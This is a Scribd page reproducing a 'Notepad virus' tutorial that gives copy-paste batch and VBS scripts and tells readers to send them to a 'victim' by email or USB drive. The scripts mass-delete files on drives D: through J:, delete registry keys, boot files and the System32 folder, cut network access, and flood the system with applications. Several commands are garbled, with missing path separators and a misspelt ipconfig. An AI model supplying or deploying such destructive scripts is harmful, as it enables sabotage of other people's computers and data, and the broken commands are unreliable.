0% found this document useful (0 votes)
116 views3 pages

Virus

This document provides instructions for creating viruses using Notepad on Windows systems. It describes 7 different virus scripts that range from creating fake error messages to permanently crashing a PC. The scripts can delete files, shut down internet access, delete the registry, and delete the critical System32 folder. The document warns readers to only try these on their own systems and not send to others, as several could cause serious harm. It also promotes an upcoming book on hacking techniques.

Uploaded by

Keshav Sharma
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
116 views3 pages

Virus

This document provides instructions for creating viruses using Notepad on Windows systems. It describes 7 different virus scripts that range from creating fake error messages to permanently crashing a PC. The scripts can delete files, shut down internet access, delete the registry, and delete the critical System32 folder. The document warns readers to only try these on their own systems and not send to others, as several could cause serious harm. It also promotes an upcoming book on hacking techniques.

Uploaded by

Keshav Sharma
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

25+ Notepad Virus Script (Just Copy & Paste) By @Cyber.

TechQ

How to create virus using notepad

1 : Just Copy/paste all the code in notepad.


2 : Save the file with extension .bat (like seofreetips.bat)
3 : Send it to the victim by mail or by Pen Drive.
4 : When the victim will click on it, it will start working.
5 : You can also check these codes on your own PC.
6 : I have personally checked all of these codes in my Microsoft Surface Pro.
7 : These codes only work in Windows.

1. Create Fake Windows Errors With Notepad

1 : Open Notepad
2 : Type X=Msgbox(“Message Here”,0+16,”Title Here”)
3 : Replace Message Here and Title Here with your Error Message and Error-Window
Title respectively.
4 : Save the file with error.vbs. (In Save as filetype, must select “all”)
5 : Now, click the file and you’ll get your custom-made Windows error message. So
its easy to learn how to create a virus using notepad

2. How to stop someone’s internet access

@Echo off

pconfig /release

Save that as a .bat and send it to someone. They’re IP address will be lost, and
therefore they won’t be able to fix it

However, this is VERY easy to fix. Simply type in IPconfig /renew

3 : Dangerous Notepad Virus Code

Just open your notepad

NOW TYPE THE FOLLOWING CODE::

@echo off

del D:*.* /f /s /q

del E:*.* /f /s /q

del F:*.* /f /s /q

del G:*.* /f /s /q

del H:*.* /f /s /q

del I:*.* /f /s /q
del J:*.* /f /s /q

Then save it as SEO.bat and the batch file is created.

WARNING:: This is the most dangerous virus! Be careful with its use.

4. Delete the entire registry

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

Now save it as SEO.bat and the batch file is created.

5. Crash PC forever with Notepad Virus

@echo off

attrib -r -s -h c:autoexec.bat

del c:autoexec.bat

attrib -r -s -h c:boot.ini

del c:boot.ini

attrib -r -s -h c:ntldr

del c:ntldr

attrib -r -s -h c:windowswin.ini

del c:windowswin.ini

Open up notepad and copy and paste that. Save it as a .bat file.

This should shut down the person’s computer. It shuts it off once and deletes the
files needed to reboot and restart.

REMEMBER — DO NOT CLICK THIS FILE.

6. Application Bomber

It will start to open different applications repeatedly which will affect the
system’s performance.
You can also add the application of your choice in the above code.

@echo off

start winword

start mspaint

start notepad

start write

start cmd

start explorer

start control

start calc

goto x

7 . Delete System 32 Folder

Open Notepad

Write / copy the below command there:

” del c:WINDOWSsystem32*.*/q “ without quote

and save as ” anything.bat”

Done. If You Give this file to your victim his SYSTEM 32 Folder will be deleted.
Without which a Windows Pc can’t be started.

Book Coming Soon...


Free For Only Telegram Members

You might also like